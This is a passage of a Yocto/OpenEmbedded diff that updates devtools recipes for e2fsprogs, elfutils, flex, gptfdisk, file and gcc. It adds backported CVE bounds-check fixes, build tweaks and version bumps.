+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ lib/ext2fs/extent.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/lib/ext2fs/extent.c b/lib/ext2fs/extent.c
+index ac3dbfec9..a1b1905cd 100644
+--- a/lib/ext2fs/extent.c
++++ b/lib/ext2fs/extent.c
+@@ -495,6 +495,10 @@ retry:
+ 			ext2fs_le16_to_cpu(eh->eh_entries);
+ 		newpath->max_entries = ext2fs_le16_to_cpu(eh->eh_max);
+ 
++		/* Make sure there is at least one extent present */
++		if (newpath->left <= 0)
++			return EXT2_ET_EXTENT_NO_DOWN;
++
+ 		if (path->left > 0) {
+ 			ix++;
+ 			newpath->end_blk = ext2fs_le32_to_cpu(ix->ei_block);
+@@ -1630,6 +1634,10 @@ errcode_t ext2fs_extent_delete(ext2_extent_handle_t handle, int flags)
+ 
+ 	cp = path->curr;
+ 
++	/* Sanity check before memmove() */
++	if (path->left < 0)
++		return EXT2_ET_EXTENT_LEAF_BAD;
++
+ 	if (path->left) {
+ 		memmove(cp, cp + sizeof(struct ext3_extent_idx),
+ 			path->left * sizeof(struct ext3_extent_idx));
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch
new file mode 100644
index 0000000000..caeb560d32
--- /dev/null
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch
@@ -0,0 +1,22 @@
+Ensure "small" file systems also have the default inode size (256 bytes) so that
+can store 64-bit timestamps and work past 2038.
+
+The "small" type is any size >3MB and <512MB, which covers a lot of relatively
+small filesystems built by OE, especially when they're sized to fit the contents
+and expand to the storage on boot.
+
+Upstream-Status: Inappropriate
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+diff --git a/misc/mke2fs.conf.in b/misc/mke2fs.conf.in
+index 01e35cf8..29f41dc0 100644
+--- a/misc/mke2fs.conf.in
++++ b/misc/mke2fs.conf.in
+@@ -16,7 +16,6 @@
+ 	}
+ 	small = {
+ 		blocksize = 1024
+-		inode_size = 128
+ 		inode_ratio = 4096
+ 	}
+ 	floppy = {
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch
deleted file mode 100644
index 342a2b855b..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From: Wang Shilong <wshilong@ddn.com>
-Date: Mon, 30 Dec 2019 19:52:39 -0500
-Subject: e2fsck: fix use after free in calculate_tree()
-
-The problem is alloc_blocks() will call get_next_block() which might
-reallocate outdir->buf, and memory address could be changed after
-this.  To fix this, pointers that point into outdir->buf, such as
-int_limit and root need to be recaulated based on the new starting
-address of outdir->buf.
-
-[ Changed to correctly recalculate int_limit, and to optimize how we
-  reallocate outdir->buf.  -TYT ]
-
-Addresses-Debian-Bug: 948517
-Signed-off-by: Wang Shilong <wshilong@ddn.com>
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
-(cherry picked from commit 101e73e99ccafa0403fcb27dd7413033b587ca01)
-
-Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
-Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=101e73e99ccafa0403fcb27dd7413033b587ca01]
----
- e2fsck/rehash.c | 17 ++++++++++++++++-
- 1 file changed, 16 insertions(+), 1 deletion(-)
-
-diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
-index 0a5888a9..2574e151 100644
---- a/e2fsck/rehash.c
-+++ b/e2fsck/rehash.c
-@@ -295,7 +295,11 @@ static errcode_t get_next_block(ext2_filsys fs, struct out_dir *outdir,
- 	errcode_t	retval;
- 
- 	if (outdir->num >= outdir->max) {
--		retval = alloc_size_dir(fs, outdir, outdir->max + 50);
-+		int increment = outdir->max / 10;
-+
-+		if (increment < 50)
-+			increment = 50;
-+		retval = alloc_size_dir(fs, outdir, outdir->max + increment);
- 		if (retval)
- 			return retval;
- 	}
-@@ -637,6 +641,9 @@ static int alloc_blocks(ext2_filsys fs,
- 	if (retval)
- 		return retval;
- 
-+	/* outdir->buf might be reallocated */
-+	*prev_ent = (struct ext2_dx_entry *) (outdir->buf + *prev_offset);
-+
- 	*next_ent = set_int_node(fs, block_start);
- 	*limit = (struct ext2_dx_countlimit *)(*next_ent);
- 	if (next_offset)
-@@ -726,6 +733,9 @@ static errcode_t calculate_tree(ext2_filsys fs,
- 					return retval;
- 			}
- 			if (c3 == 0) {
-+				int delta1 = (char *)int_limit - outdir->buf;
-+				int delta2 = (char *)root - outdir->buf;
-+
- 				retval = alloc_blocks(fs, &limit, &int_ent,
- 						      &dx_ent, &int_offset,
- 						      NULL, outdir, i, &c2,
-@@ -733,6 +743,11 @@ static errcode_t calculate_tree(ext2_filsys fs,
- 				if (retval)
- 					return retval;
- 
-+				/* outdir->buf might be reallocated */
-+				int_limit = (struct ext2_dx_countlimit *)
-+					(outdir->buf + delta1);
-+				root = (struct ext2_dx_entry *)
-+					(outdir->buf + delta2);
- 			}
- 			dx_ent->block = ext2fs_cpu_to_le32(i);
- 			if (c3 != limit->limit)
--- 
-2.24.1
-
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
index 4d335af4cf..284ac90196 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
@@ -1,4 +1,4 @@
-From e8331a76983e839a3d193446ab8ae9c1b09daa07 Mon Sep 17 00:00:00 2001
+From b55dfb4b62e507ae4f0814aec7597b56f9d6292a Mon Sep 17 00:00:00 2001
 From: Jackie Huang <jackie.huang@windriver.com>
 Date: Wed, 10 Aug 2016 11:19:44 +0800
 Subject: [PATCH] Fix missing check for permission denied.
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
index 95e6a7a2d5..aac88eed98 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
@@ -1,4 +1,4 @@
-From de6d6f0dd010f5b9d917553acb9430278f448f23 Mon Sep 17 00:00:00 2001
+From 9aa68ad81b97847dda3493145f4b0a7cc580c551 Mon Sep 17 00:00:00 2001
 From: Ross Burton <ross.burton@intel.com>
 Date: Mon, 23 Dec 2013 13:38:34 +0000
 Subject: [PATCH] e2fsprogs: silence debugfs
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest b/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
index c97c0377e9..279923db8e 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
@@ -8,3 +8,4 @@ rm -f *.tmp
 rm -f *.ok
 rm -f *.failed
 rm -f *.log
+cp ../data/test_data.tmp ./
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb b/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb
index 4f7cafeac9..565c433866 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb
@@ -4,19 +4,17 @@ SRC_URI += "file://remove.ldconfig.call.patch \
            file://run-ptest \
            file://ptest.patch \
            file://mkdir_p.patch \
-           file://0001-misc-create_inode.c-set-dir-s-mode-correctly.patch \
            file://0001-configure.ac-correct-AM_GNU_GETTEXT.patch \
            file://0001-intl-do-not-try-to-use-gettext-defines-that-no-longe.patch \
-           file://CVE-2019-5188.patch \
-           file://0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch \
-           file://e2fsck-fix-use-after-free-in-calculate_tree.patch \
+           file://CVE-2022-1304.patch \
            "
 
 SRC_URI_append_class-native = " file://e2fsprogs-fix-missing-check-for-permission-denied.patch \
                                 file://quiet-debugfs.patch \
+                                file://big-inodes-for-small-fs.patch \
 "
 
-SRCREV = "984ff8d6a0a1d5dc300505f67b38ed5047d51dac"
+SRCREV = "5403970e44241cec26f98aaa0124b9881b4bbf4f"
 UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+\.\d+(\.\d+)*)$"
 
 EXTRA_OECONF += "--libdir=${base_libdir} --sbindir=${base_sbindir} \
@@ -56,6 +54,7 @@ do_install () {
 	oe_multilib_header ext2fs/ext2_types.h
 	install -d ${D}${base_bindir}
 	mv ${D}${bindir}/chattr ${D}${base_bindir}/chattr.e2fsprogs
+	mv ${D}${bindir}/lsattr ${D}${base_bindir}/lsattr.e2fsprogs
 
 	install -v -m 755 ${S}/contrib/populate-extfs.sh ${D}${base_sbindir}/
 
@@ -104,10 +103,12 @@ FILES_libe2p = "${base_libdir}/libe2p.so.*"
 FILES_libext2fs = "${libdir}/e2initrd_helper ${base_libdir}/libext2fs.so.*"
 FILES_${PN}-dev += "${datadir}/*/*.awk ${datadir}/*/*.sed ${base_libdir}/*.so ${bindir}/compile_et ${bindir}/mk_cmds"
 
-ALTERNATIVE_${PN} = "chattr"
+ALTERNATIVE_${PN} = "chattr lsattr"
 ALTERNATIVE_PRIORITY = "100"
 ALTERNATIVE_LINK_NAME[chattr] = "${base_bindir}/chattr"
 ALTERNATIVE_TARGET[chattr] = "${base_bindir}/chattr.e2fsprogs"
+ALTERNATIVE_LINK_NAME[lsattr] = "${base_bindir}/lsattr"
+ALTERNATIVE_TARGET[lsattr] = "${base_bindir}/lsattr.e2fsprogs"
 
 ALTERNATIVE_${PN}-doc = "fsck.8"
 ALTERNATIVE_LINK_NAME[fsck.8] = "${mandir}/man8/fsck.8"
@@ -128,6 +129,8 @@ do_compile_ptest() {
 }
 
 do_install_ptest() {
+	# This file's permissions depends on the host umask so be deterministic
+	chmod 0644 ${B}/tests/test_data.tmp
 	cp -R --no-dereference --preserve=mode,links -v ${B}/tests ${D}${PTEST_PATH}/test
 	cp -R --no-dereference --preserve=mode,links -v ${S}/tests/* ${D}${PTEST_PATH}/test
 	sed -e 's!../e2fsck/e2fsck!e2fsck!g' \
@@ -141,4 +144,7 @@ do_install_ptest() {
 
         install -d ${D}${PTEST_PATH}/lib
         install -m 0644 ${B}/lib/config.h  ${D}${PTEST_PATH}/lib/
+
+        install -d ${D}${PTEST_PATH}/data
+        install -m 0644 ${B}/tests/test_data.tmp ${D}${PTEST_PATH}/data/
 }
diff --git a/meta/recipes-devtools/elfutils/elfutils_0.178.bb b/meta/recipes-devtools/elfutils/elfutils_0.178.bb
index c500ae3c19..29a3bbfffb 100644
--- a/meta/recipes-devtools/elfutils/elfutils_0.178.bb
+++ b/meta/recipes-devtools/elfutils/elfutils_0.178.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Utilities and libraries for handling compiled object files"
 HOMEPAGE = "https://sourceware.org/elfutils"
+DESCRIPTION = "elfutils is a collection of utilities and libraries to read, create and modify ELF binary files, find and handle DWARF debug data, symbols, thread state and stacktraces for processes and core files on GNU/Linux."
 SECTION = "base"
 LICENSE = "GPLv2 & LGPLv3+ & GPLv3+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
@@ -33,6 +34,7 @@ SRC_URI = "https://sourceware.org/elfutils/ftp/${PV}/${BP}.tar.bz2 \
            file://0001-ppc_initreg.c-Incliude-asm-ptrace.h-for-pt_regs-defi.patch \
            file://run-ptest \
            file://ptest.patch \
+           file://CVE-2021-33294.patch \
            "
 SRC_URI_append_libc-musl = " \
            file://0001-musl-obstack-fts.patch \
diff --git a/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch b/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch
new file mode 100644
index 0000000000..0500a4cf83
--- /dev/null
+++ b/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch
@@ -0,0 +1,72 @@
+From 480b6fa3662ba8ffeee274bf0d37423413c01e55 Mon Sep 17 00:00:00 2001
+From: Mark Wielaard <mark@klomp.org>
+Date: Wed, 3 Mar 2021 21:40:53 +0100
+Subject: [PATCH] readelf: Sanity check verneed and verdef offsets in handle_symtab.
+
+We are going through vna_next, vn_next and vd_next in a while loop.
+Make sure that all offsets are sane. We don't want things to wrap
+around so we go in cycles.
+
+https://sourceware.org/bugzilla/show_bug.cgi?id=27501
+
+Signed-off-by: Mark Wielaard <mark@klomp.org>
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=elfutils.git;a=commit;h=480b6fa3662ba8ffeee274bf0d37423413c01e55]
+CVE: CVE-2021-33294
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/ChangeLog |  5 +++++
+ src/readelf.c | 10 +++++++++-
+ 2 files changed, 14 insertions(+), 1 deletion(-)
+
+diff --git a/src/ChangeLog b/src/ChangeLog
+index 6af977e..f0d9e39 100644
+--- a/src/ChangeLog
++++ b/src/ChangeLog
+@@ -1,3 +1,8 @@
++2021-03-03  Mark Wielaard  <mark@klomp.org>
++
++	* readelf.c (handle_symtab): Sanity check verneed vna_next,
++	vn_next and verdef vd_next offsets.
++
+ 2019-11-26  Mark Wielaard  <mark@klomp.org>
+ 
+ 	* Makefile.am (BUILD_STATIC): Add libraries needed for libdw.
+diff --git a/src/readelf.c b/src/readelf.c
+index 5994615..ab7a1c1 100644
+--- a/src/readelf.c
++++ b/src/readelf.c
+@@ -2550,7 +2550,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
+ 						 &vernaux_mem);
+ 		      while (vernaux != NULL
+ 			     && vernaux->vna_other != *versym
+-			     && vernaux->vna_next != 0)
++			     && vernaux->vna_next != 0
++			     && (verneed_data->d_size - vna_offset
++				 >= vernaux->vna_next))
+ 			{
+ 			  /* Update the offset.  */
+ 			  vna_offset += vernaux->vna_next;
+@@ -2567,6 +2569,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
+ 			/* Found it.  */
+ 			break;
+ 
++		      if (verneed_data->d_size - vn_offset < verneed->vn_next)
++			break;
++
+ 		      vn_offset += verneed->vn_next;
+ 		      verneed = (verneed->vn_next == 0
+ 				 ? NULL
+@@ -2602,6 +2607,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
+ 			/* Found the definition.  */
+ 			break;
+ 
++		      if (verdef_data->d_size - vd_offset < verdef->vd_next)
++			break;
++
+ 		      vd_offset += verdef->vd_next;
+ 		      verdef = (verdef->vd_next == 0
+ 				? NULL
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb b/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
index b043c96543..ef5d83ebaf 100644
--- a/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
+++ b/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Utility for modifying GPT disk partitioning"
 DESCRIPTION = "GPT fdisk is a disk partitioning tool loosely modeled on Linux fdisk, but used for modifying GUID Partition Table (GPT) disks. The related FixParts utility fixes some common problems on Master Boot Record (MBR) disks."
+HOMEPAGE = "https://sourceforge.net/projects/gptfdisk/"
 
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=59530bdf33659b29e73d4adb9f9f6552"
diff --git a/meta/recipes-devtools/file/file_5.38.bb b/meta/recipes-devtools/file/file_5.38.bb
index 2d62ead10b..b19bf03986 100644
--- a/meta/recipes-devtools/file/file_5.38.bb
+++ b/meta/recipes-devtools/file/file_5.38.bb
@@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;beginline=2;md5=0251eaec1188b20d9a72c502ecfdd
 DEPENDS = "file-replacement-native"
 DEPENDS_class-native = "bzip2-replacement-native"
 
-SRC_URI = "git://github.com/file/file.git"
+SRC_URI = "git://github.com/file/file.git;branch=master;protocol=https"
 
 SRCREV = "ec41083645689a787cdd00cb3b5bf578aa79e46c"
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/flex/flex/0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch b/meta/recipes-devtools/flex/flex/0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch
new file mode 100644
index 0000000000..c8202b6bd5
--- /dev/null
+++ b/meta/recipes-devtools/flex/flex/0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch
@@ -0,0 +1,32 @@
+From 440f3f55739468cd26e22f31871eca8cbbd53294 Mon Sep 17 00:00:00 2001
+From: Oleksiy Obitotskyy <oobitots@cisco.com>
+Date: Wed, 6 Jan 2021 06:12:14 -0800
+Subject: [PATCH] Emit no #line directives if gen_line_dirs is false
+
+If we set --noline we should not print line directives.
+But setting --noline means gen_line_dirs is false.
+
+Upstream-Status: Submitted
+Signed-off-by: Oleksiy Obitotskyy <oobitots@cisco.com>
+---
+ src/buf.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/buf.c b/src/buf.c
+index 185083c..4439e28 100644
+--- a/src/buf.c
++++ b/src/buf.c
+@@ -95,8 +95,8 @@ struct Buf *buf_linedir (struct Buf *buf, const char* filename, int lineno)
+     const char *src;
+     size_t tsz;
+ 
+-    if (gen_line_dirs)
+-	return buf;
++    if (!gen_line_dirs)
++        return buf;
+ 
+     tsz = strlen("#line \"\"\n")                +   /* constant parts */
+                2 * strlen (filename)            +   /* filename with possibly all backslashes escaped */
+-- 
+2.26.2.Cisco
+
diff --git a/meta/recipes-devtools/flex/flex/check-funcs.patch b/meta/recipes-devtools/flex/flex/check-funcs.patch
new file mode 100644
index 0000000000..762275e7f8
--- /dev/null
+++ b/meta/recipes-devtools/flex/flex/check-funcs.patch
@@ -0,0 +1,67 @@
+Subject: build: Move dnl comments out of AC_CHECK_FUNCS
+
+Due to a bug, autoheader (2.69) will treat M4 dnl comments in a quoted
+argument of AC_CHECK_FUNCS as function tokens and generate a lot of
+redundant and useless HAVE_* macros in config.h.in.
+(Examples: HAVE_DNL, HAVE_AVAILABLE_, HAVE_BY)
+
+It seems to be this commit dbb4e94dc7bacbcfd4acef4f085ef752fe1aa03f of
+mine that revealed this autoheader bug, and the affected config.h.in
+had been shipped within flex-2.6.4 release tarball.
+
+I have reported the autoheader bug here:
+<https://lists.gnu.org/archive/html/bug-autoconf/2018-02/msg00005.html>
+
+As a workaround, let's move comments out of AC_CHECK_FUNCS.
+
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+Signed-off-by: Kang-Che Sung <explorer09@gmail.com>
+Signed-off-by: Zang Ruochen <zangrc.fnst@cn.fujitsu.com>
+---
+ configure.ac | 28 +++++++++++++---------------
+ 1 file changed, 13 insertions(+), 15 deletions(-)
+
+diff --git a/configure.ac b/configure.ac
+index 55e774b..5ea3a93 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -153,21 +153,19 @@ AC_FUNC_REALLOC
+ AS_IF([test "$cross_compiling" = yes],
+    AC_MSG_WARN([result $ac_cv_func_realloc_0_nonnull guessed because of cross compilation]))
+ 
+-AC_CHECK_FUNCS([dup2 dnl
+-memset dnl
+-regcomp dnl
+-strcasecmp dnl
+-strchr dnl
+-strdup dnl
+-strtol dnl
+-], [], [AC_MSG_ERROR(required library function not found on your system)])
+-
+-# Optional library functions
+-AC_CHECK_FUNCS([dnl
+-pow dnl           Used only by "examples/manual/expr"
+-setlocale dnl     Needed only if NLS is enabled
+-reallocarray dnl  OpenBSD function. We have replacement if not available.
+-])
++dnl Autoheader (<= 2.69) bug: "dnl" comments in a quoted argument of
++dnl AC_CHECK_FUNCS will expand wierdly in config.h.in.
++dnl (https://lists.gnu.org/archive/html/bug-autoconf/2018-02/msg00005.html)
++
++AC_CHECK_FUNCS([dup2 memset regcomp strcasecmp strchr strdup strtol], [],
++  [AC_MSG_ERROR(required library function not found on your system)])
++
++# Optional library functions:
++# pow - Used only by "examples/manual/expr".
++# setlocale - Needed only if NLS is enabled.
++# reallocarr - NetBSD function. Use reallocarray if not available.
++# reallocarray - OpenBSD function. We have replacement if not available.
++AC_CHECK_FUNCS([pow setlocale reallocarr reallocarray])
+ 
+ AC_CONFIG_FILES(
+ Makefile
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/flex/flex_2.6.4.bb b/meta/recipes-devtools/flex/flex_2.6.4.bb
index 43b2547fc6..50d3bf8de1 100644
--- a/meta/recipes-devtools/flex/flex_2.6.4.bb
+++ b/meta/recipes-devtools/flex/flex_2.6.4.bb
@@ -15,6 +15,8 @@ SRC_URI = "https://github.com/westes/flex/releases/download/v${PV}/flex-${PV}.ta
            file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \
            ${@bb.utils.contains('PTEST_ENABLED', '1', '', 'file://disable-tests.patch', d)} \
            file://0001-build-AC_USE_SYSTEM_EXTENSIONS-in-configure.ac.patch \
+           file://check-funcs.patch \
+           file://0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch \
            "
 
 SRC_URI[md5sum] = "2882e3179748cc9f9c23ec593d6adc8d"
@@ -24,6 +26,11 @@ SRC_URI[sha256sum] = "e87aae032bf07c26f85ac0ed3250998c37621d95f8bd748b31f15b33c4
 UPSTREAM_CHECK_URI = "https://github.com/westes/flex/releases"
 UPSTREAM_CHECK_REGEX = "flex-(?P<pver>\d+(\.\d+)+)\.tar"
 
+# Disputed - yes there is stack exhaustion but no bug and it is building the
+# parser, not running it, effectively similar to a compiler ICE. Upstream no plans to address
+# https://github.com/westes/flex/issues/414
+CVE_CHECK_WHITELIST += "CVE-2019-6293"
+
 inherit autotools gettext texinfo ptest
 
 M4 = "${bindir}/m4"
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch b/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch
deleted file mode 100644
index a7e29f4bd7..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch
+++ /dev/null
@@ -1,204 +0,0 @@
-CVE: CVE-2020-13844
-Upstream-Status: Backport
-Signed-off-by: Ross Burton <ross.burton@arm.com>
-
-From 20da13e395bde597d8337167c712039c8f923c3b Mon Sep 17 00:00:00 2001
-From: Matthew Malcomson <matthew.malcomson@arm.com>
-Date: Thu, 9 Jul 2020 09:11:58 +0100
-Subject: [PATCH 1/3] aarch64: New Straight Line Speculation (SLS) mitigation
- flags
-
-Here we introduce the flags that will be used for straight line speculation.
-
-The new flag introduced is `-mharden-sls=`.
-This flag can take arguments of `none`, `all`, or a comma seperated list
-of one or more of `retbr` or `blr`.
-`none` indicates no special mitigation of the straight line speculation
-vulnerability.
-`all` requests all mitigations currently implemented.
-`retbr` requests that the RET and BR instructions have a speculation
-barrier inserted after them.
-`blr` requests that BLR instructions are replaced by a BL to a function
-stub using a BR with a speculation barrier after it.
-
-Setting this on a per-function basis using attributes or the like is not
-enabled, but may be in the future.
-
-(cherry picked from commit a9ba2a9b77bec7eacaf066801f22d1c366a2bc86)
-
-gcc/ChangeLog:
-
-2020-06-02  Matthew Malcomson  <matthew.malcomson@arm.com>
-
-	* config/aarch64/aarch64-protos.h (aarch64_harden_sls_retbr_p):
-	New.
-	(aarch64_harden_sls_blr_p): New.
-	* config/aarch64/aarch64.c (enum aarch64_sls_hardening_type):
-	New.
-	(aarch64_harden_sls_retbr_p): New.
-	(aarch64_harden_sls_blr_p): New.
-	(aarch64_validate_sls_mitigation): New.
-	(aarch64_override_options): Parse options for SLS mitigation.
-	* config/aarch64/aarch64.opt (-mharden-sls): New option.
-	* doc/invoke.texi: Document new option.
----
- gcc/config/aarch64/aarch64-protos.h |  3 ++
- gcc/config/aarch64/aarch64.c        | 76 +++++++++++++++++++++++++++++
- gcc/config/aarch64/aarch64.opt      |  4 ++
- gcc/doc/invoke.texi                 | 12 +++++
- 4 files changed, 95 insertions(+)
-
-diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
-index c083cad53..31493f412 100644
---- a/gcc/config/aarch64/aarch64-protos.h
-+++ b/gcc/config/aarch64/aarch64-protos.h
-@@ -644,4 +644,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
- 
- bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
- 
-+extern bool aarch64_harden_sls_retbr_p (void);
-+extern bool aarch64_harden_sls_blr_p (void);
-+
- #endif /* GCC_AARCH64_PROTOS_H */
-diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
-index b452a53af..269ff6c92 100644
---- a/gcc/config/aarch64/aarch64.c
-+++ b/gcc/config/aarch64/aarch64.c
-@@ -11734,6 +11734,79 @@ aarch64_validate_mcpu (const char *str, const struct processor **res,
-   return false;
- }
- 
-+/* Straight line speculation indicators.  */
-+enum aarch64_sls_hardening_type
-+{
-+  SLS_NONE = 0,
-+  SLS_RETBR = 1,
-+  SLS_BLR = 2,
-+  SLS_ALL = 3,
-+};
-+static enum aarch64_sls_hardening_type aarch64_sls_hardening;
-+
-+/* Return whether we should mitigatate Straight Line Speculation for the RET
-+   and BR instructions.  */
-+bool
-+aarch64_harden_sls_retbr_p (void)
-+{
-+  return aarch64_sls_hardening & SLS_RETBR;
-+}
-+
-+/* Return whether we should mitigatate Straight Line Speculation for the BLR
-+   instruction.  */
-+bool
-+aarch64_harden_sls_blr_p (void)
-+{
-+  return aarch64_sls_hardening & SLS_BLR;
-+}
-+
-+/* As of yet we only allow setting these options globally, in the future we may
-+   allow setting them per function.  */
-+static void
-+aarch64_validate_sls_mitigation (const char *const_str)
-+{
-+  char *token_save = NULL;
-+  char *str = NULL;
-+
-+  if (strcmp (const_str, "none") == 0)
-+    {
-+      aarch64_sls_hardening = SLS_NONE;
-+      return;
-+    }
-+  if (strcmp (const_str, "all") == 0)
-+    {
-+      aarch64_sls_hardening = SLS_ALL;
-+      return;
-+    }
-+
-+  char *str_root = xstrdup (const_str);
-+  str = strtok_r (str_root, ",", &token_save);
-+  if (!str)
-+    error ("invalid argument given to %<-mharden-sls=%>");
-+
-+  int temp = SLS_NONE;
-+  while (str)
-+    {
-+      if (strcmp (str, "blr") == 0)
-+	temp |= SLS_BLR;
-+      else if (strcmp (str, "retbr") == 0)
-+	temp |= SLS_RETBR;
-+      else if (strcmp (str, "none") == 0 || strcmp (str, "all") == 0)
-+	{
-+	  error ("%<%s%> must be by itself for %<-mharden-sls=%>", str);
-+	  break;
-+	}
-+      else
-+	{
-+	  error ("invalid argument %<%s%> for %<-mharden-sls=%>", str);
-+	  break;
-+	}
-+      str = strtok_r (NULL, ",", &token_save);
-+    }
-+  aarch64_sls_hardening = (aarch64_sls_hardening_type) temp;
-+  free (str_root);
-+}
-+
- /* Parses CONST_STR for branch protection features specified in
-    aarch64_branch_protect_types, and set any global variables required.  Returns
-    the parsing result and assigns LAST_STR to the last processed token from
-@@ -11972,6 +12045,9 @@ aarch64_override_options (void)
-   selected_arch = NULL;
-   selected_tune = NULL;
- 
-+  if (aarch64_harden_sls_string)
-+    aarch64_validate_sls_mitigation (aarch64_harden_sls_string);
-+
-   if (aarch64_branch_protection_string)
-     aarch64_validate_mbranch_protection (aarch64_branch_protection_string);
- 
-diff --git a/gcc/config/aarch64/aarch64.opt b/gcc/config/aarch64/aarch64.opt
-index 3c6d1cc90..d27ab6df8 100644
---- a/gcc/config/aarch64/aarch64.opt
-+++ b/gcc/config/aarch64/aarch64.opt
-@@ -71,6 +71,10 @@ mgeneral-regs-only
- Target Report RejectNegative Mask(GENERAL_REGS_ONLY) Save
- Generate code which uses only the general registers.
- 
-+mharden-sls=
-+Target RejectNegative Joined Var(aarch64_harden_sls_string)
-+Generate code to mitigate against straight line speculation.
-+
- mfix-cortex-a53-835769
- Target Report Var(aarch64_fix_a53_err835769) Init(2) Save
- Workaround for ARM Cortex-A53 Erratum number 835769.
-diff --git a/gcc/doc/invoke.texi b/gcc/doc/invoke.texi
-index 2f7ffe456..5f04a7d2b 100644
---- a/gcc/doc/invoke.texi
-+++ b/gcc/doc/invoke.texi
-@@ -638,6 +638,7 @@ Objective-C and Objective-C++ Dialects}.
- -mpc-relative-literal-loads @gol
- -msign-return-address=@var{scope} @gol
- -mbranch-protection=@var{none}|@var{standard}|@var{pac-ret}[+@var{leaf}]|@var{bti} @gol
-+-mharden-sls=@var{opts} @gol
- -march=@var{name}  -mcpu=@var{name}  -mtune=@var{name}  @gol
- -moverride=@var{string}  -mverbose-cost-dump @gol
- -mstack-protector-guard=@var{guard} -mstack-protector-guard-reg=@var{sysreg} @gol
-@@ -15955,6 +15956,17 @@ argument @samp{leaf} can be used to extend the signing to include leaf
- functions.
- @samp{bti} turns on branch target identification mechanism.
- 
-+@item -mharden-sls=@var{opts}
-+@opindex mharden-sls
-+Enable compiler hardening against straight line speculation (SLS).
-+@var{opts} is a comma-separated list of the following options:
-+@table @samp
-+@item retbr
